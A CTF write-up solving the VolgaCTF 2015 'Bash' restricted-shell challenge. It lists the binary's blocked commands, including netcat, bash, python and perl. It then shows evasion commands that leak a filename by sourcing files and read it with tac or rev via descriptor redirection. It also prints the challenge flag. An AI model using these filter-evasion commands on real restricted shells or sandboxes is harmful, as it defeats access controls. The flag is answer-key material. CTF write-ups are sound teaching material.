VolgaCTF 2015 Quals - Bash (125pts) writeup

The challenge description was: Just another super-puper secure shell. nc bash.2015.volgactf.ru 7777

A binary called tiny_bash was also provided.

Let's quickly check what happens when we connect to it:

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> help
>> ls
This command is prohibited.
>> exit
>> ^C

Appears like a small shell with only a specific subset of commands allowed to run. At this point it might be quicker to check the binary and see if was can get a list of said prohibited commands to find out how we could bypass this limitation. A quick and dirty method is to just run the command strings on the binary and it may yeld the hard-coded list:

mrt:~/ctf/volga/pwn/bash$ strings tiny_bash
...
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
This command is prohibited.
This command is incorrect.
flag
bash
python
netcat
perl
args
pico
echo
grep
find
sudo
system
exec
regexp
tail
head
less
more
...

Seems like we have the usual commands in that list and even the word flag is in there. There are certainly more commands than that such as cat and awk. We need to find a way to see if we have files in the current folder, and if that's the case we will have to find a way to read it despite not having the usual commands available.

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> . * 2>&4
sh: 1: .: this_file_contains_flag_cat_it.txt: not found

What happened here is the following, we used the source command for all files in the current folder, source will either run the content of a script or complain and report an error and often give valuable information. Since we were interested in possible errors we redirected stderr to the socket (thanks to my teammate deception for showing me that). In this case we now have the name of the text file containing our flag: this_file_contains_flag_cat_it.txt

The cat command is of course forbidden, but there are still many ways to output the content of a file:

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> tac thi* 1>&4
flag{desire_is_the_key_to_motivation}>>

We used the command tac (concatenate and print files in reverse) and redirected stdout to our socket to get the flag, another way would be using rev:

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> rev thi* 1>&4
}noitavitom_ot_yek_eht_si_erised{galf

We got our flag:

{desire_is_the_key_to_motivation}